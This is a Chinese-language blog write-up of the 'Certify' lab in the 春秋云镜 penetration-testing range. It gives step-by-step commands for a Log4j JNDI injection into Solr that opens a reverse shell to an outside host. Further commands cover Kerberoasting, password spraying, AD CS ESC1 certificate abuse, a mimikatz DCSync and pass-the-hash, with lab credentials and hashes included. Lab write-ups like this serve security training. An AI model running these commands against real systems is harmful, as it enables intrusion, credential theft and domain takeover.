fffffilm's learning

春秋云镜-Certify

该文章更新于 2025.03.09
  1. 春秋云镜-Certify
    1. flag01
    2. flag02
    3. flag03
    4. flag04

渗透

春秋云镜-Certify

flag01

fscan扫一遍

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
fscan -h 39.99.134.186

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.99.134.186:8983 open
39.99.134.186:80 open
39.99.134.186:22 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://39.99.134.186      code:200 len:612    title:Welcome to nginx!
[*] WebTitle http://39.99.134.186:8983 code:302 len:0      title:None 跳转url: http://39.99.134.186:8983/solr/
[*] WebTitle http://39.99.134.186:8983/solr/ code:200 len:16555  title:Solr Admin
已完成 3/3
[*] 扫描结束,耗时: 53.6961754s

访问web服务,发现存在log4j

image-20241028190731734

通过dns检测确实存在log4j,那通过log4j打jndi注入。

/solr/admin/cores?action=${jndi:ldap://1p9bvr.dnslog.cn}

image-20241028191433612

welk1n/JNDI-Injection-Exploit at v1.0用法

1
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c " {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE1Ni4yMzguMjMzLjU1LzIzMzMgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 156.238.233.55

http://39.99.134.186:8983/solr/admin/collections?action=${jndi:ldap://156.238.233.55:1389/xi4rks}

另一个工具Mr-xn/JNDIExploit-1

image-20241028195610466

http://39.99.134.186:8983/solr/admin/collections?action=${jndi:ldap://156.238.233.55:1389/Basic/ReverseShell/156.238.233.55/2333}

成功弹shell

image-20241028200111547

发现是一个普通权限,但是可以通过sudo中设置的grc提权。

image-20241028200055857

成功拿到flag01

image-20241028200317664

flag01: flag{692d0ff1-2b22-4052-8126-5731fe7e1e8f}

flag02

搭代理,扫内网。

image-20241028200431810

1
./fscan -h 172.22.9.19/24

扫一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
[*] Icmp alive hosts len is: 4
172.22.9.7:445 open
172.22.9.26:445 open
172.22.9.47:445 open
172.22.9.7:139 open
172.22.9.7:135 open
172.22.9.26:139 open
172.22.9.47:139 open
172.22.9.26:135 open
172.22.9.7:80 open
172.22.9.7:88 open
172.22.9.47:80 open
172.22.9.47:22 open
172.22.9.19:80 open
172.22.9.19:22 open
172.22.9.47:21 open
172.22.9.19:8983 open
[*] alive ports len is: 16
start vulscan
[*] WebTitle http://172.22.9.19        code:200 len:612    title:Welcome to nginx!
[*] NetInfo 
[*]172.22.9.26
   [->]DESKTOP-CBKTVMO
   [->]172.22.9.26
[*] WebTitle http://172.22.9.47        code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[*] NetInfo 
[*]172.22.9.7
   [->]XIAORANG-DC
   [->]172.22.9.7
[*] NetBios 172.22.9.7      [+] DC:XIAORANG\XIAORANG-DC    
[*] NetBios 172.22.9.26     DESKTOP-CBKTVMO.xiaorang.lab        Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.9.47     fileserver                          Windows 6.1
[*] OsInfo 172.22.9.47  (Windows 6.1)
[*] WebTitle http://172.22.9.19:8983   code:302 len:0      title:None 跳转url: http://172.22.9.19:8983/solr/
[*] WebTitle http://172.22.9.19:8983/solr/ code:200 len:16555  title:Solr Admin
[*] WebTitle http://172.22.9.7         code:200 len:703    title:IIS Windows Server
[+] PocScan http://172.22.9.7 poc-yaml-active-directory-certsrv-detect

先分析一下,整理整理思路。

172.22.9.7 DC:XIAORANG\XIAORANG-DC

172.22.9.26 Windows Server 2016 Datacenter 14393

172.22.9.47 fileserver

172.22.9.19 外网。

一个已经打完了的,一个是DC域控。一个文件服务器,还有一个内网主机。

可以SMB登录文件管理系统。

1
proxychains4 impacket-smbclient 172.22.9.47

image-20241111200352961

flag02: flag{4dc07eb1-3cc4-4c71-a95e-bfcbb9e01056}

flag03

刚刚拿到了一个db文件,先看看里面有什么。

image-20241111200815171

image-20241111200830302

wow,我要开喷了。先把数据导出来。由于数据量不大可以直接全选复制出来。或者用navicat的导出功能,导出的数据是双引号包裹的,全删了就好了。

1
proxychains4 crackmapexec smb 172.22.9.26 -u user.txt -p pass.txt --continue-on-success

image-20241111210422929

image-20241111210449201

拿到两个

1
2
xiaorang.lab\zhangjian:i9XDE02pLVf
xiaorang.lab\liupeng:fiAzGwEMgTY

rdp都失败了。flag2的提示说SPN,搜索得到

由于 Kerberos 认证依赖于 SPN,因此攻击者可能会尝试滥用 SPN 来进行身份验证攻击,比如“Kerberoasting”攻击,利用已配置的 SPN 提取 Kerberos 服务票据,并尝试离线破解服务账户的哈希值。

利用impacket-GetUserSPNs对每一个SPN 进行 Kerberoasting

1
2
proxychains4 impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
proxychains4 impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/liupeng:fiAzGwEMgTY

拿到四个哈希,但是会重复。

image-20241111210645656

hashcat爆破,让hashcat自己识别哈希类别

hashcat hash.txt rockyou.txt

得到两个账号密码

1
2
xiaorang.lab\zhangxia   MyPass2@@6
xiaorang.lab\chenchen   @Passw0rd@

然后尝试rdp,但是什么都拿不到。

然后尝试AD CS 模板相关的漏洞。查看证书情况

1
proxychains4 certipy-ad find -u 'zhangxia@xiaorang.lab'  -password 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdout

image-20241112200146167

image-20241112200247201

有个ESC1,申请 XR Manager 证书模版并伪造域管理员,得到administrator.pfx,然后利用administrator.pfx证书获取 TGT 和 NTLM Hash

这里直接打会超时

image-20241112200334120

加一个host

image-20241112200851881

1
proxychains4 certipy-ad req -u 'zhangxia@xiaorang.lab' -p 'MyPass2@@6' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca 'xiaorang-XIAORANG-DC-CA' -template 'XR Manager' -upn 'administrator@xiaorang.lab'

拿到证书

image-20241112200812022

然后利用证书拿域管哈希

1
proxychains4 certipy-ad auth -pfx administrator.pfx -dc-ip 172.22.9.7

报错了

[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

image-20241116173101380

上天啊,来个渗透大爹救救我吧。 几个月后又来试了一下,成功了(后来了解到可以使用RBCD来攻击,详情可以看春秋云镜-MagicRelay

image-20250301145522255

然后pth。

1
proxychains crackmapexec smb 172.22.9.26 -u administrator -H2f1b57eefb2d152196836b0516abea80 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

image-20241116173010257

或者使用Certify配合Rubeus拿域管哈希也行。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
C:\Users\zhangxia\Desktop\film>Certify.exe find /vulnerable

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=xiaorang,DC=lab'

[*] Listing info about the Enterprise CA 'xiaorang-XIAORANG-DC-CA'

    Enterprise CA Name            : xiaorang-XIAORANG-DC-CA
    DNS Hostname                  : XIAORANG-DC.xiaorang.lab
    FullName                      : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
    Cert Thumbprint               : 37BFD9FE73CA81E18E7A87CEBD90AF267E57170E
    Cert Serial                   : 43A73F4A37050EAA4E29C0D95BC84BB5
    Cert Start Date               : 2023/7/14 12:33:21
    Cert End Date                 : 2028/7/14 12:43:21
    Cert Chain                    : CN=xiaorang-XIAORANG-DC-CA,DC=xiaorang,DC=lab
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
      Allow  ManageCA, ManageCertificates               XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                               : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
    Template Name                         : XR Manager
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : 安全电子邮件, 加密文件系统, 客户端身份验证
    mspki-certificate-application-policy  : 安全电子邮件, 加密文件系统, 客户端身份验证
    Permissions
      Enrollment Permissions
        Enrollment Rights           : NT AUTHORITY\Authenticated UsersS-1-5-11
                                      XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Domain Users         S-1-5-21-990187620-235975882-534697781-513
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
      Object Control Permissions
        Owner                       : XIAORANG\Administrator        S-1-5-21-990187620-235975882-534697781-500
        WriteOwner Principals       : XIAORANG\Administrator        S-1-5-21-990187620-235975882-534697781-500
                                      XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteDacl Principals        : XIAORANG\Administrator        S-1-5-21-990187620-235975882-534697781-500
                                      XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteProperty Principals    : XIAORANG\Administrator        S-1-5-21-990187620-235975882-534697781-500
                                      XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519



Certify completed in 00:00:10.0749826

用XR Manager模板为 XIAORANG\Administrator 注册证书:

1
Certify.exe request /ca:CA01.xiaorang.lab\xiaorang-CA01-CA /template:"XR Manager" /altname:XIAORANG.LAB\Administrator

报错了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[*] Action: Request a Certificates

[*] Current user context    : XIAORANG\zhangxia
[*] No subject name specified, using current context as subject.

[*] Template                : XR Manager
[*] Subject                 : CN=zhangxia, CN=Users, DC=xiaorang, DC=lab
[*] AltName                 : XIAORANG.LAB\Administrator

[*] Certificate Authority   : CA01.xiaorang.lab\xiaorang-CA01-CA
[X] Error sending the certificate request: System.Runtime.InteropServices.COMException (0x800706BA): CCertRequest::Submit: RPC 服务器不可用。 0x800706ba (WIN32: 1722 RPC_S_SERVER_UNAVAILABLE)
   在 CERTCLILib.ICertRequest3.Submit(Int32 Flags, String strRequest, String strAttributes, String strConfig)
   在 Certify.Cert.SendCertificateRequest(String CA, String message)
   在 Certify.Cert.RequestCert(String CA, Boolean machineContext, String templateName, String subject, String altName, Boolean install)[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

如果这一个成功的话会输出一个pem格式证书文件。然后将证书格式转换为.pfx 格式。

1
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

然后使用 Rubeus 或 certipy 进行身份验证

1
Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password: /ptt

获得票据后导出 hash

1
mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit

flag03: flag{525886c4-919b-473f-9d7f-6a263c8e2d0f}

flag04

1
proxychains crackmapexec smb 172.22.9.7 -u administrator -H2f1b57eefb2d152196836b0516abea80 -d xiaorang.lab -x "type Users\Administrator\flag\flag04.txt"

image-20241116173037397

flag04: flag{654ca06e-4170-49c5-bfd5-18701a20c385}

参考文章:

春秋云境 Certify WP - fdx_xdf - 博客园

Certify - 春秋云境 | h0ny’s blog

渗透